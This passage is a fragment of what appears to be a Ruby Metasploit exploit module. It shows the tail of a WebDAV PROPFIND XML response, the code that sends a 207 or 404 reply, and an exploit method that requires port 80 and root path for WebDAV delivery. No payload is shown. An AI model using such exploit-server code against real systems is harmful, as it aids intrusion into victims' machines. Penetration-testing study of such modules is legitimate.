Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | else print_status("Sending 404 for #{path} ...") send_not_found(cli) return end # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml' cli.send_response(resp) end # # Make sure we're on the right port/path to support WebDAV # def exploit if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' end super end end